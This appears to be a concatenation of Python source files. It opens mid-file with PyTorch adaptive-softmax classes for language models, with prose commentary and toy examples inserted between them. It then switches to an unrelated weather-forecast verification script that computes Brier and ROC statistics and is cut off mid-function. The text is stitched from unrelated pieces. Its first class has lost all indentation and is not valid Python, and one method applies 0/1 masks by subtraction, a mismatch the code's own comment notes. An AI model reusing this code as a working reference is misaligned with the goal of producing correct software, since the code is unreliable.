torch.zeros(self.n_clusters, self.d_embed)
)
self.cluster_bias = nn.Parameter(torch.zeros(self.n_clusters))
self.out_layers = nn.ModuleList()
self.out_projs = nn.ParameterList()
if div_val == 1:
for i in range(len(self.cutoffs)):
if d_proj != d_embed:
self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_embed)))
else:
self.out_projs.append(None)
self.out_layers.append(nn.Linear(d_embed, n_token))
else:
for i in range(len(self.cutoffs)):
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
d_emb_i = d_embed // (div_val ** i)
self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_emb_i)))
self.out_layers.append(nn.Linear(d_emb_i, r_idx - l_idx))
self.keep_order = keep_order
def _compute_logit(self, hidden, weight, bias, proj):
if proj is None:
logit = F.linear(hidden, weight, bias=bias)
else:
# if CUDA_MAJOR <= 9 and CUDA_MINOR <= 1:
proj_hid = F.linear(hidden, proj.t().contiguous())
logit = F.linear(proj_hid, weight, bias=bias)
# else:
# logit = torch.einsum('bd,de,ev->bv', (hidden, proj, weight.t()))
# if bias is not None:
# logit = logit + bias
return logit
def forward(self, hidden, target, keep_order=False, learn_offset=False):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self._compute_logit(
hidden,
self.out_layers[0].weight,
self.out_layers[0].bias,
self.out_projs[0],
)
nll = (
-F.log_softmax(logit, dim=-1).gather(1, target.unsqueeze(1)).squeeze(1)
)
else:
# construct weights and biases
weights, biases = [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0].weight[l_idx:r_idx]
bias_i = self.out_layers[0].bias[l_idx:r_idx]
else:
weight_i = self.out_layers[i].weight
bias_i = self.out_layers[i].bias
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
# head_logit[:,0] = -float('inf')
head_logprob = F.log_softmax(head_logit, dim=1)
nll = torch.zeros_like(target, dtype=hidden.dtype, device=hidden.device)
offset = 0
cutoff_values = [0] + self.cutoffs
for i in range(len(cutoff_values) - 1):
l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
mask_i = (target >= l_idx) & (target < r_idx)
indices_i = mask_i.nonzero().squeeze()
if indices_i.numel() == 0:
continue
target_i = target.index_select(0, indices_i) - l_idx
head_logprob_i = head_logprob.index_select(0, indices_i)
if i == 0:
logprob_i = head_logprob_i.gather(1, target_i[:, None]).squeeze(1)
else:
weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
hidden_i = hidden.index_select(0, indices_i)
tail_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
tail_logprob_i = F.log_softmax(tail_logit_i, dim=1)
logprob_i = head_logprob_i[:, -i] + tail_logprob_i.gather(
1, target_i[:, None]
).squeeze(1)
if (hasattr(self, "keep_order") and self.keep_order) or keep_order:
nll.index_copy_(0, indices_i, -logprob_i)
else:
nll[offset : offset + logprob_i.size(0)].copy_(-logprob_i)
offset += logprob_i.size(0)
return nll
def get_top_50_words_and_props(self, hidden, target, keep_order=False):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self._compute_logit(
hidden,
self.out_layers[0].weight,
self.out_layers[0].bias,
self.out_projs[0],
)
all_probs = F.softmax(logit, dim=-1)
probs, words = torch.topk(all_probs, k=50, dim=-1)
else:
# construct weights and biases
weights, biases = [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0].weight[l_idx:r_idx]
bias_i = self.out_layers[0].bias[l_idx:r_idx]
else:
weight_i = self.out_layers[i].weight
bias_i = self.out_layers[i].bias
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
# head_logit[:,0] = -float('inf')
# head softmax
head_probs = F.softmax(head_logit, dim=1)
head_argmax = torch.argmax(head_probs, dim=1)
head_n_words = head_weight.size()[0] - self.n_clusters
# cutoff_values=[0,1000,50000,100000]
cutoff_values = [0] + self.cutoffs
words = torch.zeros(
size=(hidden.size()[0], 50), dtype=torch.long, device=hidden.device
)
probs = torch.zeros(size=(hidden.size()[0], 50), device=hidden.device)
for i in range(len(cutoff_values) - 1):
if i == 0:
cluster_i_indices = torch.nonzero(
head_argmax < head_n_words
).squeeze()
cluster_i_probs = head_probs.index_select(0, cluster_i_indices)[
:, : -self.n_clusters
]
cluster_i_probs, cluster_i_words = torch.topk(
cluster_i_probs, k=50, dim=-1
)
probs.index_copy_(0, cluster_i_indices, cluster_i_probs)
words.index_copy_(0, cluster_i_indices, cluster_i_words)
else:
cluster_i_indices = torch.nonzero(
head_argmax == (head_n_words + i - 1)
).squeeze()
hidden_i = hidden.index_select(0, cluster_i_indices)
weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
cluster_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
cluster_i_probs = F.softmax(cluster_logit_i, dim=1)
cluster_i_probs, cluster_i_words = torch.topk(
cluster_i_probs, k=50, dim=-1
)
probs.index_copy_(0, cluster_i_indices, cluster_i_probs)
words.index_copy_(0, cluster_i_indices, cluster_i_words)
return words, probs
def get_all_props(self, hidden, target, keep_order=False):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self._compute_logit(
hidden,
self.out_layers[0].weight,
self.out_layers[0].bias,
self.out_projs[0],
)
all_probs = F.softmax(logit, dim=-1)
else:
# construct weights and biases
weights, biases = [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0].weight[l_idx:r_idx]
bias_i = self.out_layers[0].bias[l_idx:r_idx]
else:
weight_i = self.out_layers[i].weight
bias_i = self.out_layers[i].bias
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
# head_logit[:,0] = -float('inf')
# head softmax
head_probs = F.softmax(head_logit, dim=1)
cutoff_values = [0] + self.cutoffs
all_probs = torch.zeros(
size=(hidden.size()[0], self.out_layers[0].weight.size()[0]),
dtype=torch.float,
device=hidden.device,
)
for i in range(len(cutoff_values) - 1):
l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
mask_i = (target >= l_idx) & (target < r_idx)
indices_i = mask_i.nonzero().squeeze()
temp_prob = torch.zeros(
size=(indices_i.size()[0], all_probs.size()[1]),
dtype=torch.float,
device=hidden.device,
)
if i == 0:
cluster_i_probs = head_probs.index_select(0, indices_i)[
:, : -self.n_clusters
]
else:
hidden_i = hidden.index_select(0, indices_i)
weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
cluster_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
cluster_i_probs = F.softmax(cluster_logit_i, dim=1)
temp_prob.index_copy_(
1,
                    torch.arange(
                        l_idx, r_idx, dtype=torch.long, device=hidden.device
                    ),
cluster_i_probs,
)
all_probs.index_copy_(0, indices_i, temp_prob)
all_probs = all_probs.cpu()
return all_probs
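The class above factorizes the softmax: frequent "head" words share a softmax with one extra logit per tail cluster, and a tail word's log-probability is its cluster's head log-prob plus its within-cluster log-prob. A self-contained toy check of that factorization (plain tensors, toy sizes, not this class's API):

```python
import torch
import torch.nn.functional as F

torch.manual_seed(0)
d, n_head, n_tail = 4, 3, 5          # 3 head words, one tail cluster of 5
hidden = torch.randn(2, d)           # [len*bsz x d_proj]

head_w = torch.randn(n_head + 1, d)  # head words + 1 cluster logit
tail_w = torch.randn(n_tail, d)

head_logprob = F.log_softmax(hidden @ head_w.t(), dim=1)
tail_logprob = F.log_softmax(hidden @ tail_w.t(), dim=1)

# log p(tail word j) = log p(cluster | h) + log p(j | cluster, h)
full_logprob = torch.cat(
    [head_logprob[:, :n_head], head_logprob[:, -1:] + tail_logprob], dim=1
)

# The factorized distribution still normalizes over all 8 words.
print(torch.allclose(full_logprob.exp().sum(dim=1), torch.ones(2)))  # True
```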
class ClassedProjectedAdaptiveLogSoftmax(nn.Module):
def __init__(
self,
n_token,
d_embed,
d_proj,
cutoffs,
div_val=1,
keep_order=False,
cl_all_root_index=None,
cl_all_leaf_index=None,
word2class=None,
):
super(ClassedProjectedAdaptiveLogSoftmax, self).__init__()
self.n_token = n_token
self.d_embed = d_embed
self.d_proj = d_proj
self.cutoffs = cutoffs + [n_token]
self.cutoff_ends = [0] + self.cutoffs
self.div_val = div_val
        self.learn_offset = bool(word2class)
self.word2class = word2class
self.cl_all_root_index = cl_all_root_index
self.cl_all_leaf_index = cl_all_leaf_index
self.shortlist_size = self.cutoffs[0]
self.n_clusters = len(self.cutoffs) - 1
self.head_size = self.shortlist_size + self.n_clusters
self.nll_loss = nn.CrossEntropyLoss(reduction='none')
# self.remove_root = []
# self.remove_leaf = []
# self.remove_root_and_leaf = []
if self.n_clusters > 0:
self.cluster_weight = nn.Parameter(
torch.zeros(self.n_clusters, self.d_embed)
)
self.cluster_bias = nn.Parameter(torch.zeros(self.n_clusters))
for i in range(len(self.cutoffs)):
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
                cur_length = r_idx - l_idx
                if i == 0:
                    cur_length += len(self.cutoffs) - 1
                root_index = [
                    index - l_idx
                    for index in self.cl_all_root_index
                    if index < r_idx and index >= l_idx
                ]
                leaf_index = [
                    index - l_idx
                    for index in self.cl_all_leaf_index
                    if index < r_idx and index >= l_idx
                ]
# self.register_buffer('remove_root_{}'.format(i), torch.zeros(cur_length).index_fill_(0, torch.tensor(root_index),float("inf")))
# self.register_buffer('remove_leaf_{}'.format(i), torch.zeros(cur_length).index_fill_(0, torch.tensor(leaf_index),float("inf")))
# self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.zeros(cur_length).index_fill_(0, torch.tensor(root_index+leaf_index),float("inf")))
self.register_buffer('remove_root_{}'.format(i), torch.ones(cur_length).index_fill_(0, torch.tensor(root_index),float(0)))
self.register_buffer('remove_leaf_{}'.format(i), torch.ones(cur_length).index_fill_(0, torch.tensor(leaf_index),float(0)))
self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.ones(cur_length).index_fill_(0, torch.tensor(root_index+leaf_index),float(0)))
else:
            i = 0
# self.register_buffer('remove_root_{}'.format(i), torch.zeros(n_token).index_fill_(0, torch.tensor(cl_all_root_index),float("inf")))
# self.register_buffer('remove_leaf_{}'.format(i), torch.zeros(n_token).index_fill_(0, torch.tensor(cl_all_leaf_index),float("inf")))
# self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.zeros(n_token).index_fill_(0, torch.tensor(cl_all_root_index+cl_all_leaf_index),float("inf")))
self.register_buffer('remove_root_{}'.format(i), torch.ones(n_token).index_fill_(0, torch.tensor(cl_all_root_index),float(0)))
self.register_buffer('remove_leaf_{}'.format(i), torch.ones(n_token).index_fill_(0, torch.tensor(cl_all_leaf_index),float(0)))
self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.ones(n_token).index_fill_(0, torch.tensor(cl_all_root_index+cl_all_leaf_index),0))
        self.out_layers = nn.ModuleList()
        self.proj_flag = False
        if div_val == 1:
            if d_proj != d_embed:
                self.proj_flag = True
                self.out_layers.append(nn.Sequential(
                    nn.Linear(d_proj, d_embed, bias=False),
                    nn.Linear(d_embed, n_token)))
            else:
                self.out_layers.append(nn.Sequential(nn.Linear(d_embed, n_token)))
        else:
            self.proj_flag = True
            for i in range(len(self.cutoffs)):
                l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
                d_emb_i = d_embed // (div_val ** i)
                self.out_layers.append(nn.Sequential(
                    nn.Linear(d_proj, d_emb_i, bias=False),
                    nn.Linear(d_emb_i, r_idx - l_idx)))

        self.keep_order = keep_order
    def _compute_logit(self, hidden, weight, bias, proj):
        if proj is None:
            logit = F.linear(hidden, weight, bias=bias)
        else:
            # if CUDA_MAJOR <= 9 and CUDA_MINOR <= 1:
            proj_hid = F.linear(hidden, proj.t().contiguous())
            logit = F.linear(proj_hid, weight, bias=bias)
            # else:
            #     logit = torch.einsum('bd,de,ev->bv', (hidden, proj, weight.t()))
            #     if bias is not None:
            #         logit = logit + bias
        return logit
    def forward(
        self,
        hidden,
        target,
        keep_order=True,
        predict_root=False,
        general_words_only=False,
    ):
        """
        hidden :: [len*bsz x d_proj]
        target :: [len*bsz]
        predict_root: True for class label + general words; False for normal LM
        general_words_only: True for general words only
        """
        if hidden.size(0) != target.size(0):
            raise RuntimeError(
                "Input and target should have the same size in the batch dimension."
            )

        if self.n_clusters == 0:
            logit = self.out_layers[0](hidden)
            # log(mask + eps) leaves kept logits unchanged and drives masked ones to -inf.
            if predict_root:
                logit = logit + (getattr(self, 'remove_leaf_{}'.format(0)) + 1e-45).log()
            else:
                logit = logit + (getattr(self, 'remove_root_{}'.format(0)) + 1e-45).log()
            if general_words_only:
                logit = logit + (getattr(self, 'remove_root_and_leaf_{}'.format(0)) + 1e-45).log()
            nll = (
                -F.log_softmax(logit, dim=-1).gather(1, target.unsqueeze(1)).squeeze(1)
            )
        else:
            # construct weights and biases
            weights, biases, projs = [], [], []
            for i in range(len(self.cutoffs)):
                if self.div_val == 1:
                    l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
                    weight_i = self.out_layers[0][-1].weight[l_idx:r_idx]
                    bias_i = self.out_layers[0][-1].bias[l_idx:r_idx]
                    if self.proj_flag:
                        projs_i = self.out_layers[0][0].weight
                    else:
                        projs_i = None
                else:
                    weight_i = self.out_layers[i][-1].weight
                    bias_i = self.out_layers[i][-1].bias
                    projs_i = self.out_layers[i][0].weight
                if i == 0:
                    weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
                    bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
                weights.append(weight_i)
                biases.append(bias_i)
                projs.append(projs_i)

            head_weight, head_bias, head_proj = weights[0], biases[0], projs[0]
            head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
            if predict_root:
                head_logit = head_logit + (getattr(self, 'remove_leaf_{}'.format(0)) + 1e-45).log()
            else:
                head_logit = head_logit + (getattr(self, 'remove_root_{}'.format(0)) + 1e-45).log()
            if general_words_only:
                head_logit = head_logit + (getattr(self, 'remove_root_and_leaf_{}'.format(0)) + 1e-45).log()
            head_logprob = F.log_softmax(head_logit, dim=1)

            nll = torch.zeros_like(target, dtype=torch.float32, device=hidden.device)
            offset = 0
            cutoff_values = [0] + self.cutoffs
            for i in range(len(cutoff_values) - 1):
                l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
                mask_i = (target >= l_idx) & (target < r_idx)
                indices_i = mask_i.nonzero().squeeze()
                if indices_i.numel() == 0:
                    continue
                target_i = target.index_select(0, indices_i) - l_idx
                head_logprob_i = head_logprob.index_select(0, indices_i)
                if i == 0:
                    logprob_i = self.nll_loss(head_logit.index_select(0, indices_i).float(), target_i)
                else:
                    weight_i, bias_i, proj_i = weights[i], biases[i], projs[i]
                    hidden_i = hidden.index_select(0, indices_i)
                    tail_logit_i = self._compute_logit(hidden_i, weight_i, bias_i, proj_i)
                    if predict_root:
                        tail_logit_i = tail_logit_i + (getattr(self, 'remove_leaf_{}'.format(i)) + 1e-45).log()
                    else:
                        tail_logit_i = tail_logit_i + (getattr(self, 'remove_root_{}'.format(i)) + 1e-45).log()
                    if general_words_only:
                        tail_logit_i = tail_logit_i + (getattr(self, 'remove_root_and_leaf_{}'.format(i)) + 1e-45).log()
                    # Tail NLL plus the head's log-prob of choosing cluster i (stored at index -i).
                    logprob_i = self.nll_loss(tail_logit_i.float(), target_i) - head_logprob_i[:, -i]
                if (hasattr(self, "keep_order") and self.keep_order) or keep_order:
                    nll.index_copy_(0, indices_i, logprob_i)
                else:
                    nll[offset:offset + logprob_i.size(0)].copy_(logprob_i)
                    offset += logprob_i.size(0)
        return nll
    def get_top_k_words_and_props(
        self,
        hidden,
        target,
        keep_order=True,
        predict_root=False,
        general_words_only=False,
        top_k=500,
    ):
        """
        hidden :: [len*bsz x d_proj]
        target :: [len*bsz]
        """
        if hidden.size(0) != target.size(0):
            raise RuntimeError(
                "Input and target should have the same size in the batch dimension."
            )

        if self.n_clusters == 0:
            logit = self.out_layers[0](hidden)
            # NOTE: these subtractions assume the additive -inf variant of the mask
            # buffers; with the multiplicative 0/1 buffers registered in __init__,
            # the (mask + 1e-45).log() form used in forward() would be needed.
            if predict_root:
                logit = logit - getattr(self, 'remove_leaf_{}'.format(0))
            else:
                logit = logit - getattr(self, 'remove_root_{}'.format(0))
            if general_words_only:
                logit = logit - getattr(self, 'remove_root_and_leaf_{}'.format(0))
            all_probs = F.softmax(logit, dim=-1)
            if top_k == -1:
                return all_probs
            probs, words = torch.topk(all_probs, k=top_k, dim=-1)
            return words, probs  # without this return, the branch fell through to undefined names
        else:
            # construct weights and biases
            weights, biases, projs = [], [], []
            for i in range(len(self.cutoffs)):
                if self.div_val == 1:
                    l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
                    weight_i = self.out_layers[0][-1].weight[l_idx:r_idx]
                    bias_i = self.out_layers[0][-1].bias[l_idx:r_idx]
                    if self.proj_flag:
                        projs_i = self.out_layers[0][0].weight
                    else:
                        projs_i = None
                else:
                    weight_i = self.out_layers[i][-1].weight
                    bias_i = self.out_layers[i][-1].bias
                    projs_i = self.out_layers[i][0].weight
                if i == 0:
                    weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
                    bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
                weights.append(weight_i)
                biases.append(bias_i)
                projs.append(projs_i)

            head_weight, head_bias, head_proj = weights[0], biases[0], projs[0]
            head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
            head_logit = head_logit - getattr(self, 'remove_leaf_{}'.format(0))
            head_logprob = F.log_softmax(head_logit, dim=1)

            words = torch.zeros(
                size=(hidden.size()[0], self.n_token),
                dtype=torch.long,
                device=hidden.device,
            )
            probs = torch.zeros(
                size=(hidden.size()[0], self.n_token), device=hidden.device
            )
            offset = 0
            cutoff_values = [0] + self.cutoffs
            for i in range(len(cutoff_values) - 1):
                l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
                if i == 0:
                    probs[:, l_idx:r_idx] = head_logprob[:, l_idx:r_idx]
                else:
                    weight_i, bias_i, proj_i = weights[i], biases[i], projs[i]
                    tail_logit_i = self._compute_logit(hidden, weight_i, bias_i, proj_i)
                    tail_logit_i -= getattr(self, 'remove_root_{}'.format(i))
                    tail_logprob_i = F.log_softmax(tail_logit_i, dim=1)
                    logprob_i = head_logprob[:, -i].unsqueeze(1) + tail_logprob_i
                    probs[:, l_idx:r_idx] = logprob_i
            if top_k == -1:
                # log-probabilities over the full vocabulary
                return probs
            topk_probs, topk_words = torch.topk(probs, k=top_k, dim=-1)
            return topk_words, topk_probs
class HeriarchicalClassedProjectedAdaptiveLogSoftmax(nn.Module):
    def __init__(
        self,
        n_token,
        d_embed,
        d_proj,
        cutoffs,
        div_val=1,
        keep_order=False,
        cl_root_leaf_dict=None,
    ):
        super(HeriarchicalClassedProjectedAdaptiveLogSoftmax, self).__init__()
        self.n_token = n_token
        self.d_embed = d_embed
        self.d_proj = d_proj

        # here we assume 1 token only maps to 1 class
        # vocab : [c1] [c2] [t1] [t2] [t3] | [t_l1] [t_l2] | [t_l3] |
        # cutoff: [20000, 20002, 20003, ..., XXXXX, 200000, ]
        cl_all_root_index = []
        cl_all_leaf_index = []
        cutoffs = [20000]
        for k, v in cl_root_leaf_dict.items():
            cutoffs.append(cutoffs[-1] + len(v))
            cl_all_root_index.append(k)
            cl_all_leaf_index.extend(v)
        cutoffs.append(200000)
        self.cutoffs = cutoffs + [n_token]
        # cutoff: [20000, 20002, 20003, ..., XXXXX, 200000, n_token]
        self.cutoff_ends = [0] + self.cutoffs
        self.div_val = div_val
        self.cl_all_root_index = cl_all_root_index
        self.cl_all_leaf_index = cl_all_leaf_index

        self.n_clusters = len(self.cutoffs) - 1 - len(cl_all_root_index)
        if self.n_clusters > 0:
            self.cluster_weight = nn.Parameter(
                torch.zeros(self.n_clusters, self.d_embed)
            )
            self.cluster_bias = nn.Parameter(torch.zeros(self.n_clusters))

        self.out_layers = nn.ModuleList()
        self.out_projs = nn.ParameterList()
        if div_val == 1:
            for i in range(len(self.cutoffs)):
                if d_proj != d_embed:
                    self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_embed)))
                else:
                    self.out_projs.append(None)
            self.out_layers.append(nn.Linear(d_embed, n_token))
        else:
            for i in range(len(self.cutoffs)):
                l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
                d_emb_i = d_embed // (div_val ** i)
                self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_emb_i)))
                self.out_layers.append(nn.Linear(d_emb_i, r_idx - l_idx))

        self.keep_order = keep_order
    def _compute_logit(self, hidden, weight, bias, proj):
        if proj is None:
            logit = F.linear(hidden, weight, bias=bias)
        else:
            # if CUDA_MAJOR <= 9 and CUDA_MINOR <= 1:
            proj_hid = F.linear(hidden, proj.t().contiguous())
            logit = F.linear(proj_hid, weight, bias=bias)
            # else:
            #     logit = torch.einsum('bd,de,ev->bv', (hidden, proj, weight.t()))
            #     if bias is not None:
            #         logit = logit + bias
        return logit
    def forward(
        self,
        hidden,
        target,
        keep_order=True,
        predict_root=False,
        general_words_only=False,
    ):
        """
        hidden :: [len*bsz x d_proj]
        target :: [len*bsz]
        predict_root: True for class label + general words; False for normal LM
        general_words_only: True for general words only
        """
        if hidden.size(0) != target.size(0):
            raise RuntimeError(
                "Input and target should have the same size in the batch dimension."
            )

        if self.n_clusters == 0:
            logit = self._compute_logit(
                hidden,
                self.out_layers[0].weight,
                self.out_layers[0].bias,
                self.out_projs[0],
            )
            if predict_root:
                logit[:, self.cl_all_leaf_index] = -float("inf")
            else:
                logit[:, self.cl_all_root_index] = -float("inf")
            if general_words_only:
                logit[:, self.cl_all_leaf_index + self.cl_all_root_index] = -float("inf")
            nll = (
                -F.log_softmax(logit, dim=-1).gather(1, target.unsqueeze(1)).squeeze(1)
            )
        else:
            # construct weights and biases
            weights, biases = [], []
            for i in range(len(self.cutoffs)):
                if self.div_val == 1:
                    l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
                    weight_i = self.out_layers[0].weight[l_idx:r_idx]
                    bias_i = self.out_layers[0].bias[l_idx:r_idx]
                else:
                    weight_i = self.out_layers[i].weight
                    bias_i = self.out_layers[i].bias
                if i == 0:
                    weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
                    bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
                weights.append(weight_i)
                biases.append(bias_i)

            head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
            head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
            head_logprob = F.log_softmax(head_logit, dim=1)

            nll = torch.zeros_like(target, dtype=hidden.dtype, device=hidden.device)
            offset = 0
            cutoff_values = [0] + self.cutoffs
            for i in range(len(cutoff_values) - 1):
                l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
                mask_i = (target >= l_idx) & (target < r_idx)
                indices_i = mask_i.nonzero().squeeze()
                if indices_i.numel() == 0:
                    continue
                target_i = target.index_select(0, indices_i) - l_idx
                head_logprob_i = head_logprob.index_select(0, indices_i)
                if i == 0:
                    logprob_i = head_logprob_i.gather(1, target_i[:, None]).squeeze(1)
                else:
                    weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
                    hidden_i = hidden.index_select(0, indices_i)
                    tail_logit_i = self._compute_logit(hidden_i, weight_i, bias_i, proj_i)
                    tail_logprob_i = F.log_softmax(tail_logit_i, dim=1)
                    # Per-class tails follow the head in cutoff order; the
                    # generic tail clusters are indexed from the end.
                    j = (
                        i - 1
                        if i <= len(self.cl_all_root_index)
                        else -(i - len(self.cl_all_root_index))
                    )
                    logprob_i = head_logprob_i[:, j] + tail_logprob_i.gather(
                        1, target_i[:, None]
                    ).squeeze(1)
                if (hasattr(self, "keep_order") and self.keep_order) or keep_order:
                    nll.index_copy_(0, indices_i, -logprob_i)
                else:
                    nll[offset:offset + logprob_i.size(0)].copy_(-logprob_i)
                    offset += logprob_i.size(0)
        return nll
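As a side note on how these adaptive-softmax classes carve up the vocabulary: below is a minimal pure-Python sketch (my own illustration, not part of this module) of the `cutoff_ends` bucketing used throughout, where a token id maps to a cluster index plus a within-cluster offset.

```python
# Illustrative sketch of adaptive-softmax bucketing: cutoff_ends = [0] + cutoffs,
# and token id t belongs to cluster i with cutoff_ends[i] <= t < cutoff_ends[i + 1];
# its within-cluster index is t - cutoff_ends[i].
def cluster_of(token_id, cutoffs):
    cutoff_ends = [0] + list(cutoffs)
    for i in range(len(cutoff_ends) - 1):
        l_idx, r_idx = cutoff_ends[i], cutoff_ends[i + 1]
        if l_idx <= token_id < r_idx:
            return i, token_id - l_idx
    raise ValueError("token id outside vocabulary")

print(cluster_of(5, [10, 100, 1000]))    # head cluster: (0, 5)
print(cluster_of(250, [10, 100, 1000]))  # third cluster: (2, 150)
```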
# === scraps/scripts_all/scrap.py (repo: m-wessler/nbm-pqpf-deploy, MIT) ===
def extract_pqpf_verif_stats(_fhr, _urma):
    nbm_file = glob(nbm_dir + 'extract/nbm_probx_fhr%03d.nc' % _fhr)[0]
    print(nbm_file)

    # Subset the threshold value
    nbm = xr.open_dataset(nbm_file)['probx'].sel(
        y=slice(idx[0].min(), idx[0].max()),
        x=slice(idx[1].min(), idx[1].max()))

    # Subset the times
    nbm_time = nbm.valid
    urma_time = _urma.valid
    time_match = nbm_time[np.in1d(nbm_time, urma_time)].values
    time_match = np.array([t for t in time_match if pd.to_datetime(t) >= start_date])
    time_match = np.array([t for t in time_match if pd.to_datetime(t) <= end_date])

    date0 = pd.to_datetime(time_match[0]).strftime('%Y/%m/%d %H UTC')
    date1 = pd.to_datetime(time_match[-1]).strftime('%Y/%m/%d %H UTC')

    _nbm = nbm.sel(valid=time_match)
    _urma = _urma.sel(valid=time_match)

    nbm_mask, _nbm = xr.broadcast(mask, _nbm)
    urma_mask, _urma = xr.broadcast(mask, _urma)
    _nbm_masked = xr.where(nbm_mask, _nbm, np.nan)
    _urma_masked = xr.where(urma_mask, _urma, np.nan)

    data = []
    for thresh in produce_thresholds:
        print('Processing f%03d %.2f"' % (_fhr, thresh))
        _nbm_masked_select = _nbm_masked.sel(threshold=thresh) / 100
        bins = np.arange(0, 101, 10)

        N = xr.where(~np.isnan(_nbm_masked_select), 1, 0).sum()
        n = xr.where(_urma_masked > thresh, 1, 0).sum()
        o = n / N
        uncertainty = o * (1 - o)

        reliability_inner = []
        resolution_inner = []
        reliability_diagram = []
        roc_diagram = []

        for i, bounds in enumerate(zip(bins[:-1], bins[1:])):
            left, right = np.array(bounds) / 100
            center = round(np.mean([left, right]), 2)

            fk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right),
                          _nbm_masked_select, np.nan)
            nk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right), 1, 0).sum()
            ok_count = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right)
                                & (_urma_masked > thresh), 1, 0).sum()
            ok = ok_count / nk

            # reliability term: 3D (fk) against 1D (ok)
            _reliability_inner = nk * ((fk - ok) ** 2)
            _reliability_inner['center'] = center
            reliability_inner.append(_reliability_inner)

            # resolution term: all 1D quantities
            _resolution_inner = nk * ((ok - o) ** 2)
            _resolution_inner['center'] = center
            resolution_inner.append(_resolution_inner)

            reliability_diagram.append([center, ok.values])

            hit = xr.where((_nbm_masked_select > center) & (_urma_masked > thresh), 1, 0).sum(dim='valid')
            false_alarm = xr.where((_nbm_masked_select > center) & (_urma_masked <= thresh), 1, 0).sum(dim='valid')
            observed_yes = xr.where(_urma_masked > thresh, 1, 0).sum(dim='valid')
            observed_no = xr.where(_urma_masked <= thresh, 1, 0).sum(dim='valid')

            hit_rate = hit / observed_yes
            false_alarm_rate = false_alarm / observed_no
            roc_diagram.append([false_alarm_rate.mean().values, hit_rate.mean().values, center])

        reliability_inner = xr.concat(reliability_inner, dim='center')
        reliability_inner_condensed = xr.where(mask, reliability_inner.sum(dim='center'), np.nan)
        reliability = (1 / N) * reliability_inner_condensed
        reliability = reliability.mean(dim='valid')

        resolution = (1 / N) * xr.concat(resolution_inner, dim='center').sum(dim='center')

        brier = reliability - resolution + uncertainty
        brier_score = brier.mean().values
        brier_skill = 1 - (brier / o)
        brier_skill_score = brier_skill.mean().values
        brier = brier.rename('brier')
        brier_skill = brier_skill.rename('brier_skill')

